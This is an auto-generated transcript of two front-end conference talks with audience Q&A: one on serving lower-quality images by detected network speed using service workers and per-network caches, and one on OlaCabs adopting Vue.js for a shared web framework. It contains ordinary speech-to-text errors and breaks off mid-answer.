you would know that there is a factor called image quality that is associated with an image. So very simply put image quality is a scale of 100 100 being the best quality one being the lowest quality 100 being the sharpest and the best image that you can get. So I've taken this image as an example, right? Let's say I have the image quality set at 90, which is a standard for a lot of websites that set their image quality at 90. The size is 47 kb, right? Let's assume that we will use this for the 4g network. Next, let's say for 3g network, we use quality 70, which is giving us a 40% reduction in size. Now assume that you have a website which loads one MB of images. If you are able to save 400 kb out of it, you have actually saved a lot for the user who's on 3g. Similarly for 2g, we will use a smaller quality level 55 for slow 2g we will use 40 and for slow 2g we are actually reducing the size of images by almost 72%, right? That's a huge reduction for the user, right? Lot lesser data to download. So how do you change quality? This is where image kit comes in, right? We provide a lot of transformations that you can do in real time on an image. So for example, let's say I have this image URL image 31.jpeg and let's say I want to get a quality 90 image. All that I'm doing here is I'm appending a query parameter t r equal to Q-90 it get me a quality 90 image. If I change that to 60, it will give me a quality 60 image. If I change that to 10, it will give me a Q10 image and I'm not sure if you can see it on the screen or not, but then the Q10 images is actually really low in quality. If you especially notice the clouds above the house, you would find that those are really pixelated and that is the reason why the size is small, right? So apart from quality image kit does a lot of other transformations, but for now I will stick to quality, right? That is what we are trying to optimize. So we have figured out two parts. We know what network the user is on. We have figured out a way how to change the quality in real time. You can use anything apart from image kit. If you can do that, right? I'm just using image kit as an example. Now, how do we handle all of this in our code? Right? The idea is that we do not want to be changing our code, right? We cannot have our server sending different URLs for different network speeds. We do not want those kinds of changes, right? So this is where the service worker comes in service worker is I guess a lot of you would have worked on service workers or work with service workers, right? That service worker sits as a intermediate proxy between the user's browser, the cash storage in browser and the network, right? And what the service worker allows us to do is it allows us to intercept every request and then decide where do we get the response from? Do we get it from the storage? Do we get it from the network? Do we modify the URL and that modify the URL part is what we are looking at, right? So what we will do is let's say I have in my HTML, let's say I am using image 1.jpeg if I detect 4G in my service worker, I will change the URL to use quality 90. If I find 3G, I will change it to use quality 70 on 2G. We will use 55 on slow 2G 40, right? This is what we will use the service worker for that. We will intercept the request and we will change the URL from where we are getting the response. So let's look at some code. My image tag remains exactly the same. I'm not changing the image tag. My quality parameter does not come in the image tag, right? Our image tag remains the same. Next part is obviously we install a service worker. I won't go into the depths of it. It's a pretty standard thing. You just need to call service worker to register the file name and gets registered. Now this is the main function, right? Service worker allows us to hook on to an event called the fetch event. This fetch event is basically fired for every request that is originating from your browser. What we do in the first two lines is that we it's a very basic check. We check if it's a JPEG image or a PNG or a J for a WebP, right? If it is, we continue further. We check the connection type for that connection type. We determine what quality do we need to use and in line number 11 line number 13. In fact, we create the new URL. The new URL basically would be we have appended the quality parameter. Let's say to that URL and in line 14 to 17 instead of responding with the same URL, we respond with the modified URL. So for example, if the browser sent a request for image one dot JPEG and we modified it to let's say to use Q 70 instead of so we respond with Q 70. We do not respond with the original URL, right? So let's look at an example on how does this work? So so this is a basic something which we have created similar to an e-commerce website. I've already loaded it, but then this has been loaded without without the service worker coming into picture. What I've done is I have throttled the network to fast 3G. This is something that you can do in Chrome and I will just reload the page once and I hope that the demo works. It does. So what I have done is I have also overlaid the quality number at which the images are being pressed on, right? So use if you see all images have been fetched on quality 70, right? All of them have this number 70 overlaid in the top left corner and if you see the network tab, this is the original request, right? This is the request that the browser fired. I was resizing it to 300 by 450. The service worker intercepts it. It issues a new request which has Q 70 as one of the parameters because the service worker detected that the user is actually on a 3G network, right? So this is this is what the service worker was able to accomplish. Right? So this this is very good to begin with, right? So we were able to detect the network and we were able to modify the image. We were able to send a lighter image to the user. But then there is a problem with this, right? And the problem is that the browser does not know that you have modified the URL in the service worker, right? For the browser, it's a black box. If the browser requested for image one dot JPEG and you responded with let's say quality 40 in the image, the browser does know and the browser would cast that low quality response forever or for as long as the cash control allows it to do it, right? We do not want this to happen since we are modifying the cash on the basis of network. We do not want the browser to behave as a black box and cash everything that we are giving to it, right? So one one thing that we need to do is that we will skip the browser cash completely, right? Instead, what we will do is we will use the cash storage API, which is there in all modern browsers, I guess in most of them and we will use it to create caches for different network ties. For example, there would be a different cash for 4G. There would be different cash for 3G, 2G and slow 2G. And what we will do is we will implement a waterfall kind of a lookup wherein we always look for the best resource. We know that 4G has the best images. It has images on quality 90. So we would always prefer looking for an image in the 4G image cash. Then we will go to 3G then we will go to 2G and slow 2G. Right? This is how we will structure our cash lookups. This is something that you cannot attain in a browser. That is why we need to skip the browser cash completely. So let's look at the code. If you remember from the previous previous code example, we were responding with the the the transformed URL. So instead of that instead of responding with the transformed URL, we have a new function which is a step down cash lookup. We will we will do a cash lookup and if that cash lookup fails, then we will go to the network. Right? This is the cash lookup code. I'll give I'll simplify this for you and I've shared the code on GitHub as well. I'll share the link on where you can read the code. I'll just simplify it for you line number 10 9 and 10 is basically just looking for an object in the cash. Let's say in the 4G cash. If you find it in the 4G cash well and good. We return it from there. If not, we go to the next cash, which is 3G, right? If you find it there, we will return it from the 3G cash. If let's say we do not find it from 3G cash and we look up, let's say in the 2G cash and let's say the user is on 2G right now. If if the object is not there in the 2G cash as well, then we go to the network, which is line number 16 and 17. We go to the network. If we have a successful response, we add it to the corresponding network cash, which is being done in line number 18, right? So now we have four different caches. We are adding objects to different caches on the basis of network, right? And we are also picking up the best object that we have available at that time. If we have 4G available, we will use 4G object. So let's see how does this actually work out in a demo? Right? So let me just check if I have cleared all caches. I'll start with the slow 3G, right? So this should get me a quality 50 image ideally because it's slow 2G. Everything's slow. So you can see the first image which loaded its quality 50. I'll update this to fast 3G and I'll reload the page again. Now because the network has improved, the browser automatically fetched the better variant of the image. It fetched the quality 70 image. Let's say I remove the throttling completely and I reload the page again. So basically it takes time for the network connection type to update. So like I mentioned earlier, the network information API, it looks at the download times that the user has been observing and because I was observing 3G like download times, it kept me in that 3G bracket for slightly longer. Now that I have moved to 4G, now we get the 90 quality image. Now let's do the reverse. Let's say that the network downgrades again. Let's say the user falls back to slow 3G. What would happen? Right? We still have the best image in cash and it should ideally just pick that up. It picks up quality 90 image and if I look at the cash storage, so we have four different cash storages here. Is this visible to everyone at the back? The cash storages so we have a 4G network cash. It has all the images cashed in 4G. We have a 2G cash. We have a slow 2G slow TG. We never access slow 2G. So the cash is empty. We have a cash in IKIT in the 3G cash as well. But then 4G is the preferred one. So our images would always be picked up from this, right? So basically we have implemented a way where as soon as the users network speed upgrades, the images would upgrade as well. But then let's say if the user speeds goes down, we would look for the best image that we can serve to them and you know not downgrade his experience. Now this presents another problem, which is cash management. Earlier the browser was managing the cash for us. Now we are adding objects to the cash. So we also need to ensure that we are clearing the objects on the cash for this. I've used Google Workbox. You can figure out any other way to do it. What Google Workbox allows is that you can set up rules on every cash either on the basis of the number of objects that are there in the cash or on the on the time that for example, let's say objects in the 4G cash would remain there for let's say 30 days and I can have a maximum of 1000 objects in that case, right? I can set up this rule and I can create what is called Expiration Manager, right? So this is what we do to manage our cash. We we instantiate an Expiration Manager. The the last part of the code. This is how an Expiration Manager is defined using Workbox. We specify the max age in seconds. We specify the maximum cash entries that can be there and in addition to adding the object to the cash, we also update the timestamp when the when the object was added in the cash. That's been done on line number six. Right? So that you know the Expiration Manager can see how long this object has been in cash and from time to time we keep expiring the entries. You can you can do a very simple set interval kind of a thing every 60 seconds. You just clear out all the objects that should not be there, right? So that's a very simple way of managing what stays in the cash, right? So to summarize, one thing is very clear. It has been a long time that you know we have been optimizing for different devices, different screen sizes. It's time that we start optimizing for different network speeds as well because to be honest, network speeds are not that great in India and we must stop considering that, you know, we are accessing our websites from our offices or from our Wi-Fi's for us. Everything works blazing fast, right? But then that's not the case for our users. So we need to start thinking about them. We need to start optimizing on the network speed and we talked about images, but then you can get the gist, right? You can extend the same concept to JS and CSS. You can basically tell your server that okay, the user is on a 3G network, send me a lighter version of the website, right? So this, this can be extended to beyond images as well, right? We needed two parts of the problem. One is to detect the network changes and to maintain different caches for every network for this. We have the network information API, the service workers and the gas storage. The other part on how do we modify images in real time, that is what we do at ImageKit. Apart from quality, we have real time resizing, cropping, transformation, etc. Face detection overlays. It comes integrated with the CDN. So the performance stays right up there and you can integrate it with your infrastructure as well, right? We can talk about ImageKit later, but then as I said, you can do this even without ImageKit. You can do this with your own in-house image management solution. If you can modify quality in real time or you can use it with any other third party image product. The demo page, which I showed, it's there on this link service for SWOB 1 and the code is there on GitHub in our ImageKit GitHub. It's a very basic code. I haven't had time to add the readme file. I'll do it as soon after the talk and you can contact me either via email or follow me on Twitter. If you have any questions, that's it. Thank you. So my question is in general also in context to ImageKit as a service to say I'm on a slow network and I have images which have been loaded in poor quality, right? But as a developer, I want my user, so my images to be upgraded. So what I'm talking about is progressive enhancement. Right. Like so is ImageKit giving me something or in general, there's a solution for this? So what we discussed was a very general solution, right? If I see that the network has upgraded, that let's say the earlier the user was on a 2G network and you loaded a low quality image, but then the network upgraded to 4G, the service worker automatically fires a new URL, a new request, right? So the images automatically get updated, right? So that depends on your application logic, right? What you want to configure. I configured it in a way where it upgrades instantly. Let's say you do not want that to happen. Let's say you want, let's say you will wait for let's say five minutes before the user is on a better network to make a new request. You can implement that in a service worker, right? It's a very generic thing. It's not related to ImageKit. Like I said, it's something that you can change in your service worker itself that do you want to instantly upgrade to a better image or do you want to wait for some time or, you know, on some other logic? Do you want to upgrade to a better image? Right? It's something that you can do in the service worker itself. Hi Rahul. Yeah, we are right here and see me. Okay. Yeah, hi Rahul. My name is Shashank. So your talk was quite informative. So I am working on a couple of products in which I have to support users on IE 6, 7 and 8. Good luck with that, sir. That's all I can say. I mean, in the best case scenario, see if you if we go back to the code, the image tag basically doesn't change and if let's say the browser does not support service workers, even then the same experience gets delivered to your users. So in any case, the experience is not getting hampered. The only thing is that if the browser does support service worker, then we do something additional. Otherwise the experience on IE, et cetera, would remain the same. The image tag would load as it is. Right? Is there any alternatives because I've seen couple of GitHub projects where there are a couple of alternatives but the options are a lot. I cannot hear actually. How about now? Is it clear? Not yet. Can you hear me now? Yeah. Okay. So I was just trying to fix this and on GitHub, there are a lot of basically repositories which have this solution, but the as in the solution, there are a lot of products out there. So I'm finding it difficult to choose the right one. So a lot of products for network based optimization or image optimization or replacement for service workers for IE 8 and 7. You mean something like a polyfill for service? Yes, that's right. So I haven't exploded to be honest. I mean, I haven't come across these polyfill so I cannot comment on it as well. But then if there are, maybe I look into it and maybe I'll update my presentation and talk as well. Thank you. Hey, hi. So Chrome provides this API to the network like 2G or 3G. So what about Firefox, Safari and mobile applications? So as of now, the network information of the API is available only in Chrome and Chrome mobile, which is basically almost 70% of the users accessing normal websites, right? But then I will update my presentation. I recently came across an implementation which is done in service workers. So basically what the network information API does that it that it is calculating the effective downlink on the basis of the download speeds that the user is observing the service worker does the same thing, right? So so your support for network information kinds of get extended to other browsers with support service workers, right? So that's that's a slightly wider range of browsers than just Chrome and Chrome mobile. But then beyond that, like I said, it's it's a progressive enhancement. It's not something that, you know, if if the browser does not support, let's say network information or service workers, the experience still remains the same. But if it does support, we do something better with it. So this is a basic elementary question. So can the same approach be extended to switch the format of the image? So if I'm using Chrome and my browser supports WebP. So can I intercept a PNG image and instead serve a WebP? Right. So so in image kit, in fact, we do that automatically, right? So that is why I didn't cover it because in image kit, when we see that a browser or a device supports WebP, we automatically switch it without even changing the URL, right? But then yes, it can be extended to other browsers. If you can detect that the browser supports WebP, you know, through content negotiation as such, you can modify the URL to fetch a WebP image as well. So there are no restrictions around the like if the result mime type differs from the requested image format. So there are no restrictions. For example, you would have seen cases wherein the URL ends with dot PHP, but then the response is image, the same as slash JPEG, the content type is a JPEG image. So that that works perfectly fine because the browser is actually looking at the content type header. And in fact, the actual content that is being sent back and it tries to determine how to display that content on its own. So it doesn't matter what the original URL has in the extension for WebP. In fact, you don't need to actually go to the service worker. It's a very, it's a much simpler way in which you can, you know, implement WebP, which I can talk about, you know, after this talk, it's not related to this, but then you do not actually need to go to the extent of using service workers for it. Thank you. Hi, I have a question. Can I use this image kit? I, if my image is not uploaded on the your domain. Yes. Can I use yes, you can integrate it with your own storage or your own image server. Anything right? So we'll get it from there. We'll do everything in real time and send it back. Okay. Yeah, thank you. Hi, I have a question. Uh, as you said, that network type is returning 4g or 3g string, right? So I'm not able to hear it again. That network type is returning 3g or 4g or 2g, right? Like that. So what happens if 4g is returned, but actual speed actual downlink speed is low. Yes. So there are the two, the two observations, which I had when I was actually working on this. Yes, there are cases where the actual downlink speed is low and the browser still reports it at 4g. So in fact, if you look at the code that we have uploaded in GitHub, we take that into account that the speed is less than one megabits per second. We do not use the effective type that is being returned by the browser. We automatically set it to 3g. That is one way of doing it that you look at the downlink speed instead of the effective type that is being returned by the browser. But then, uh, there is I read it in another place that these downlink speeds and they're mapping to the effective type. It depends on it varies from browser to browser and it can change in future releases as the network speeds improve. The browsers would update their method of tagging as well. So for example, what is being tagged as 3g today? It may not be be tagged as 3g. Let's say two years down the line. So either you can rely on how the browser is tagging it or in certain exceptional cases like we have done if the downlink speed is really low, then we do not actually rely on what the browser is using to tag that. So it's it's something that you would you would need to take a call on it. Right? If you want to go with the downlink speed or if you want to go with what the browser is telling you the effective type is. Can you hear me? Can you hear me? Yeah. Yeah. So, uh, can you just quit me quickly run us through how image kid would integrate with my infrastructure? Because I think in most use cases, I would serve it from my infrastructure, right? Images offline. Oh, yeah. Thanks. That's it. Yeah. So does this image kid works only for images or it works for 3d models as well. It works for more than images as well, but then again, not in the scope of the presentation. So maybe we can catch up outside and you know, we can talk about it. Okay. Yeah. So, uh, since it improves the network optimizations by compressing the image. What if we pass the data out of the image and show some business data? Sorry. The when you compress the images or models, the data are being lost, right? Okay. So you're saying when I compressing the image, the data is being lost. Yes, but then see it's a trade off that you need to decide on on the basis of your application. I think showing a slightly lower quality image. Let's say which is 30 to 40 percent smaller, but then at least showing that image to the user with let's say an option for him to be able to fetch the original image. I guess that is still much better than not loading the image at all. Now imagine a e-commerce website where the image does not load at all versus you are at least able to show, uh, let's say a slightly lower quality variant, but then where the user still gets an idea that okay, this is a black t-shirt that you know that I'm looking at. So if the user gets some idea, I guess a fair bit of you know, reduction in quality. Obviously you would lose out on detail. That's a part of it. But then the user still gets a fair idea of what is the object that he's looking at. And I guess that turns out to be favorable for a lot of use cases. But then again, it depends on your application. You may want not to go for it at all. We pass the data of the 3D models as well as the 2D models. Sorry? We pass the data based on the e-mails or the 3D files. We pass it and show the business data to the end user. So for us, it will be not relevant to that, right? I didn't get your question. Sorry to be honest. Hello. Yeah. So for us, we pass the data out of 2D or 3D models and show the business data to the end users. Okay. So for this, if you optimize this and reduce and compress the data and send it to the end user, it won't be that much efficient for the end users. Maybe. I mean, that depends on what application you have, like I said. So this is very effective for a lot of use cases, but then maybe not in your case. Okay. Thank you. Yeah. Hi. So how the lazy loading of images, how is that different and or should it be used in combination with image optimization? So lazy loading of images is basically you're not loading something which is not visible on the screen. But then when that image is visible on the screen, you still load the highest quality variant, right? You you do not take into account that the user is on let's say a 2G network. You still attempt to fetch a larger version of the image. That is what the difference is versus network based optimization that, you know, lazy loading is something different. Lazy loading is let's say you will lost load 10 images and leave the rest of the 90 out, but then network based optimization is that when you're loading those 10 images, you would take into account that the user is on a 2G network and that you would load a lighter variant for him not load the, you know, the best quality image. So they're different concepts actually. Okay. Um, so, uh, my question is on the lines on on her question. I'm here. Oh, right in front of you. Yeah. Okay. Yeah. So, uh, say, for example, I have the image image as, you know, lazy loading. I create a hook after like, you know, 50 80% of the scroll the next 10 images should load. Okay. But if the speed is too low, sorry, if the speed is too low, can I have the service worker, like a change the quality and the and and how much time does it take for the browser to understand that the network has changed and they need to like, you know, right? So, okay. So basically there is no lag in terms of what the browser tells you the network type is right. So it's, it's instantaneous. It's when you were refreshing, uh, something happened and I was like, okay, it was slow because actually the page was still being fetched from the server. Right. So the page load is still slow. All the JavaScript that is being loaded that is also slow. Only the images have changed. So that is why I said that, you know, images is the easiest bit, but then the actual performance gain would come when you implement this thing for your pages and your JS and CSS. That is where the performance bottlenecks usually are. Right. So images though is the easiest bit in terms of if there is a delay when the service worker is modifying the request or not. Uh, to be honest, I haven't seen, uh, you know, any significant delay. It's probably just a few, a couple of milliseconds extra where the, you know, the service worker is actually modifying the URL, but then I guess it's a very, uh, it's a very small time and it doesn't really matter. I mean the user on a 2g network would probably end up loading an image in four or five seconds. If we can make him load it in three seconds by serving a lighter variant. So that kind of compensates for the extra time that has been spent in the service worker. Okay. Uh, one more question. Um, so say if you are implementing this, uh, you know, service worker to, uh, for image optimization, uh, you've seen how medium does it, right? I mean, they send a first, uh, a blurry image, which is very low in size so that the user can get the idea, you know, like it's, it's loading. And then, so would you choose that over this? So are you saying something similar to what we see on, let's say, medium dot com? Yeah. They're images. Yeah. See, it's, it's again a call that you can make on the basis of your business, uh, if you want to serve, let's say, you know, a really blurred out image. Yes, that would be the smallest image that you can serve to the user, but then that's a call that you need to make that, you know, whether it suits your business or not for an e-commerce company, it might not suit the business for a content company. It may be fine, right? If, if let's say you are loading the image of an actor, let's say in a, in an article, right? It's fine if that image shows blurred up initially, uh, but then that might not be true for an e-commerce image wherein you are loading, let's say the image of a, of a t-shirt, right? You would still want to show the actual object in a slightly more detail instead of loading a blurred image over there. Let's again, depends on your business logic, right? What do you want to achieve? Hello? Yeah. Hello here. Okay. Yeah. Please, uh, let's cut this questions. You can speak directly to this. Yeah, I am there outside. So we can discuss life. Yeah. Yeah. You can discuss outside. So we have a lunch break. Uh, let's meet at two, two 10. Thanks. Also, if anyone wants to give flash talk submissions, please do. There's still open. Yeah. Only two slots are left for the flash talks. All volunteers, please come front. We have some work to do. All volunteers. Hello, hello. Check, check, hello, check, hello fucking one, two, three check, hello hello, check, hello, hello, check check. Hello, hello. Hello hello hello check one two three four hello hello hello hello hello hello hello hello check one two three four hello hello hello hello Mike okay everyone had a good lunch everyone is anyone sleepy, or will be sleepy? We're raising our hands confidently. Okay, so just before we start a few announcements, the Angular BOF session is being held outside. There's a workshop on Alexa, which is in Audi 3, next to next. So just a quick thing of what a BOF session is. It's mainly like a discussion. You have a couple of panel members and you can put forth your questions or what an open discussion is. In addition to that, for the Flash Talks, we've got like five speakers already. There's like probably one more slot left. So just whoever submitted for the Flash Talks, if you can probably be seated in this area because after this we'll be having them the Flash Talks. So it'll just be easy to communicate the entire thing. Okay, so the next talk is on the most starred front-end library. What is that on GitHub? Okay, good, that's nice, I'm one-sided react. Okay, we actually even have some of ViewScore contributors here in the audience. He also has a workshop tomorrow, Raul is sitting there. So if you wanna learn about View or the first time thing, you can talk to him. So our next talk is by a speaker who's in one of the top 10 of India in PUBG. He's, that's an achievement, I guess. He's also an ex-Flipkart guy and he's here to share his experience about View. So Ashret. Hey everyone, I am Ashret. I work for OlaCabs as a tech lead in the Consumer Web Division. Today I'm going to speak about how we use OlaCabs, how we use UJS at OlaCabs. So before I begin my actual content of the talk, I want to set some context. So basically last year, I gave a talk at JSU about how we built a PWA for OlaCabs. And so during that talk, I covered a lot of parameters on how we chose our framework, or what were the benefits and what the journey was. So you can go and check that out on YouTube. So the reason I'm mentioning this is because this talk is sort of a continuation on that. So I'm going to highlight on the key aspect from the last talk that was which framework did we choose and how did we choose it. So first we considered Angular 1 at that point. Angular 1 was a good framework, but it had problems rendering large lists. It also had digest loop problem. But we had good in-house expertise in Angular. So that is why we had considered it first. But because of its problem, we thought we cannot go ahead with that. We'll consider something else. So next choice was React. React was a very good framework with unidirectional data flow and also virtual DOM. So the render performance was also really good. But at the same time, Angular 2 came out. So Angular 2 had incorporated unidirectional data flow, but had retained two-way data binding, or as you call it today as reactive programming within its component. So that was best of both worlds for us. So we built a POC for the OLA PWA using this. And we ran performance tests on it. So what we found is that it was a good framework, but it was very heavy. It had around 30 kb of polyfill and 198 kb of Angular 2 code, that is library code, and our sample application that we had written, it was around 50 kb. So this was a very large size, considering that we wanted to deliver this application on a mobile platform. Of course, by AOT and tree shaking, this size could be reduced. But still, the abstractions in Angular 2 made the render performance difficult. So we were looking for something lighter. That is when we looked at Vue.js and Polymer. So between Vue.js and Polymer, there was a very tight competition. They had very similar performance characteristics. We could, it really boiled down to how we wrote code in this framework as opposed to the framework itself being a bottleneck. But we went ahead with Polymer. So the rationale behind this was that our historic traffic pattern, that is we didn't have to worry about old browsers. And also for OLA, the PWA was supposed to be an experimental futuristic and the acquisition only channel because of which we didn't have to worry much about supporting old browsers. So with this, we built a very good PWA and it was showcased in Google I.O. as well as last year JSO. So let's pause this recap here and take a look at what happened after that. So OLA as a company found that web is a reliable platform. It has a very good performance and the time required to ship a application to production is significantly less as compared to Android or iOS platforms. So that is where the mandate for web generated. So what we wanted to do was replicate the capability and best practices that we found while doing the OLA PWA across all projects in the organization. So that is when we took a look at how our web stack was at OLA. There were the fragments, there were the whole frameworks were fragmented. So there were different teams using different frameworks. Even in a given team, there were multiple projects using different frameworks. So we felt that we need to have a common framework. So it was an effort to streamline and standardize the web development process across our consumer vertical, across our supply vertical and all other internal websites. We also wanted to use the same framework across our desktop and mobile and app web use. We wanted to give our developers a way where they can develop test and deploy applications at scale. So we didn't want the developers to go through choosing a framework cycle every time they develop the application. So with this in mind, we could have started to, we thought, what can we do? Of course, we can start writing our own framework or we can write some vanilla JavaScript to and enhance on top of that. But all of this is like a large cost to the organization. So what we did is that we thought there are a lot of good frameworks out there. So why don't we leverage them and not reinvent the wheel but we'll just tweak them to our needs. So one of the main thing that we learned is that web component is a very good architecture in terms of delivering web applications. Next came intercom component communication. So with our web experience, we found that if we are doing something like unidirectional data flow that is parent to child props and a child to parent events and use a store for business data that is a very good scalable architecture. Next is data driven reactive coding within the component. So we didn't want to lose out on that. Also the mobile web performance should be out of the box. That is an individual developer should not be worrying about how to deliver a performance web application. Also we should be able to leverage the lazy register of a component that was present in Polymer. So with this, the developer should be able to code and run and but at the same time, he should make conscious decisions regarding to the page load performance. That is he should not be sending down additional JavaScript which is not necessary for the critical rendering path. So he has to choose how to load the files. So this is a choice that we will give to the developers. Next, we also had a buy-in from the design team. So what we communicated to them was that we were going to have a central framework and we want to reuse libraries across the multiple projects. So we want your support so that the design that you give will be so that we can leverage on previous projects. So other minor requirements were something like we wanted to leverage HTTP too. So we had infrastructure support for that. So also Ola is supporting local languages and we are also going international. So we wanted to have that support as well. And in case we wanted to make a PWA, the same tool should be able to support that as well. And we wanted to integrate it with our build infrastructure so that developer doesn't even have to worry about how to get it to staging, how to get it to production, how to debug, how to set up the logs, how to scale up and scale down the number of servers. All of these components were also part of this. But this doesn't pertain to view assets. These are general framework, which is framework agnostic. There was also one another requirement. So now that we were writing a unified framework, so this had to be compatible below Android 5 web views. Because our traffic pattern indicated that we had a significant amount of users coming in on web views below Android 5 as well. So now these were the requirements. So the key points that we were looking was that the framework should be of a small size. It should also have less abstractions and complexity. So obviously we had seen other frameworks and we were in, we liked the philosophies of view and polymer. And so this time we had to choose a view because of the browser support constraint. And this is how we are going forward in securing our web future. We will write our code in Vue.js and we'll develop it in a web component style. We are using Vue.js in a single file component style and that we will deliver applications like a traditional compiled JS. And once the browser support for all the web components come in, we will still be writing our code in the same way we do. And at that point of time, we can reevaluate our position and see if there is, Vue is also supporting web components build by the way. Is it Vue or Polymer or any other web component library in the future? So this way I will ensure that my development pattern doesn't change by much. It's only a little bit of syntactic sugar that individual frameworks introduce. Other than that, my development style, my performance patterns, all of this remains same. So Vue, so to talk about Vue, Vue is a very good framework because it was inspired from Angular, React and Polymer. So it took best of all the frameworks and gave a good default and gave a good default build system. So if you're interested in knowing more about how Vue compares against your choice of framework, you can go to Vue documentation and check out that section. So it is a very well documented section wherein you can read a lot about how it compares with your frameworks, with other frameworks. So single file component is a development style wherein I can write the template and that is your HTML and your script and your style in a single file. So this sort of development has a lot of benefits. It's easy to use because everything you want is in a single file. You don't have to switch between tabs. You don't have to wait for a lot of compiled or complex CSS to be rendered. Also, Polymer and Vue, that is basically web components library, suggests that separation of concerns need not necessarily mean separation of file types. You can pack all the CSS and JavaScript and templates in a single file and still have a separation of concern with respect to the business components. But you don't necessarily have to separate out file types into different silos but rather have a compact single functional unit which makes debugging easy and the best part of it is you can pick and drop it into another project. Next, as I mentioned, that our developers will have to make a conscious call about how to load the assets required for the performance for the page to perform. So first I will load Vue runtime. So Vue runtime is the one which does all the framework related tasks of Vue. Vue router is a client-side routing library and Vuex is a state management pattern. So once this is loaded, next I will load one web.js. So this is something with Ola specific code and certain Ola specific modifications on one web which is particular to us. Next I will load router, store and app.js. And once app.js is downloaded, we will decide what are the components that will be loaded next. I usually load a Ajax library and then rest of the components that are required for the homepage to be functional and then we lazy load the list of the application code. So this way of loading ensures that in my critical path, I am making a conscious call and my page performance is guaranteed in a repetitive way out of the box. So every project that we do implements this. Another feature that we are using from Vue is the declare first load later which is present in Polymer as well. So I'll explain it with an example. So you will have your root base component. There will be a first parent top component, right? So in that you will declare some component like which is necessary, not necessary for the critical rendering part, but it still has to be in the parent component because for it's a reusable piece of code and child components send event to that and it will be utilized. So it may not be in the, for example, Ola notification web component which is not used in the first critical rendering path nor in the first usage by the user, but it still has to be in the root component. Now what happens if I include it in my beginning only? So it will hamper my critical rendering path. So I can declare it in my main component and I will not download it in the initial part, but I will rather download it later. And once I downloaded it later, it will, the moment the download is complete, it will react, the component will get activated and start performing its functions. So this is not going to cause any console errors. So in a typical day, we don't have any decisions to make when it comes to framework. So whenever we get a new project, we just clone our starter pack and we start writing our application logic and we don't even have to be worried about performance because performance patterns are, the best patterns are baked into the framework. And we have a shared design language and component library across teams which makes our development speed really fast over a period of time. So initially we took some time building a critical mass. That is we had to build a certain amount of library, common buttons and various other components. But once that was done, now we are at a place where in now we are delivering applications at a very good turnaround time. Also, because now we have a unified framework across Ola, the engineering folks can move across teams and contribute in terms of crunch. So this framework initially was used by, we made a POC of it and we tested out in production in one or two applications. And now it has been, and it was well tested and then it had a org-wide adaptation. So everybody in customer and supply and even the internal teams, web portals are on one web now. So there are around 20 plus projects which are running one web along with Vue.js. So let's take a look at some of the pages. So the first one is a single sign-on website which is powered using a web view, using one web. And the other, the next screenshot is your track write screen. So when you book a cab, you will share your write details with your loud ones and there is a track write link over there. So that link is powered using one web. So after this, we wanted to reduce the time taken for turnaround in Android and iOS applications. And we started to use web views instead of developing it natively for certain screens which were not in the critical flow of the booking. So this view is for merchandising view wherein we show the features and facilities that are available in the given city. So this is powered entirely using web views, built using one web. So once we built this, the organization got confidence on web platform and we started getting more and more web views to be implemented. So here you can see that donation and insurance web views which have API functionalities as well also implemented into using one web. Furthermore, we have launched new categories in both Android and iOS platforms by developing the flow, booking flow on web first and then implementing it on native. We also got a permanent like place in Android and iOS apps for certain critical flows like GDPR. GDPR is the regulation of data protection in Europe and UK. So here this particular flow is built using web views. Also the two factor authentication which is a critical component again is also being used via web views. And of all the integrations, food panda integration was quite a large one with respect to scale. So as you can see along with the category you can see a food panda icon and also the food panda information bar. So when you click on that, a full fledged food panda website is loaded in the web view and you are able to order inside Ola app. So this was a very big project wherein we built an entire website using one web. So now let's talk about how the performance works on. What is the performance metrics of one web? So Google performance standard says that you can effort to send only around 130 to 150 KB of JavaScript on a median internet connection and at median internet, medium, median phone that is your slow 3G connection with 400 KBPS speed and 400 RTT and a Motorola G4 phone. So our, let's take a look at one web footprint. So the common library is around 33 KB, some lazy loading and Ola specific library code is around 3 KB GZIP. All the values are actually in GZIP. So that is around 36 KB of library files. After that, this leaves us a healthy 100 KB of application code that we can send during the critical rendering path. So this way we ensure that all the performance patterns are baked in. So now let's take a look at some numbers. So if I ran webpage test on various websites, so the e-commerce website that is PWA, which had some performance that was perform out of the box performance, no special efforts. It had a start render of 3.2 seconds because it was using AppShell. It was interactive by 15 seconds and document complete that is HTML was pass was completed by 40 seconds. And the page size that was sent down was around 1.2 MB. Next, Ola website built in a non one web framework. It had a start render time of 12.9 seconds and it was interactive around 16 seconds. So next Ola PWA, so this is a website wherein we put a lot of effort in optimizing the performance and that had a start render of 2.4 seconds and rest parameters are also very good. Our regular view PWA, which was built, it didn't have any special performance tuning or tweaking built in. But even then it had a good start render of 6.4 seconds and interactive by 10.21 seconds. So on a one web website, which has different Do you have any other major points like comparison rights? Yeah, so what I understand is you're asking we chose Vue.js because of the browser support criteria. Is there anything else that made us choose Vue.js? Yeah. So the Vue.js components are loosely similar to polymer components. So which means that, so basically we believe in web components as the future. So web components give you benefits because it is a web components can be understood by the browser and a lot of rendering benefits are granted to you because the browser can understand what is going on in that HTML element, right? So it was the similarity of I mentioned that, you know, what were the challenges? I'm not able to. Hello? Yeah. So you did not mention what were the challenges that you faced Okay. So what were the challenges that you faced while you were creating this? I'm not able to hear you. Sorry. What were the challenges that you faced while developing this app? While developing one web. Yeah. This when you were integrating Vue in your food partner. Into food partner. So that was what you call it was after effect. Like we had already developed one web and food panda was developed, food panda app was developed recently. But to answer your question, like before that we had to understand the benefits. I mean, sorry, the performance patterns for Vue.js and create a skeleton app starter kit to replicate all the best practices and hand it out to the developers. So there was a certain amount of learning curve and also build modifications. That is adopting the Vue compile function in such a way that we can do a web comp. We wanted to be as close to web component development style and file distribution style as close as possible. If tomorrow we are using web components. So we had to face challenges in tweaking the build that is given by Vue by default. So we used the Vue v5 and Vue compiler and we had to write some modifications on top of that. You mentioned that you choose to going for Vue.js because it draws the best of other frameworks. Is it applicable, you know? I mean, universally it can be applicable irrespective of any requirements or any other needs of the application. Or we should know how other thoughts in mind before going for this Vue.js. Can you repeat it? Yeah, I told you, you mentioned that you went for this Vue.js because it draws the best practices from other frameworks. It has? It had draws, it took the best practices of other frameworks. So it can, can this be applicable irrespective of any, you know, requirements or should there be any other thoughts before going for this Vue.js? Yeah, so to phrase this question, he's saying that we have taken Vue.js because it has best practices from all frameworks. So suppose, is this sufficient or if the requirements change, do you have to reevaluate? That is the question, right? See, so that is why we have control on how we distribute our application. So we had that in mind. The benefits that it took are like, that is the reactive data system and unidirectional data flow and store. So now these are the best practices. The other best practices come in terms of, in terms of 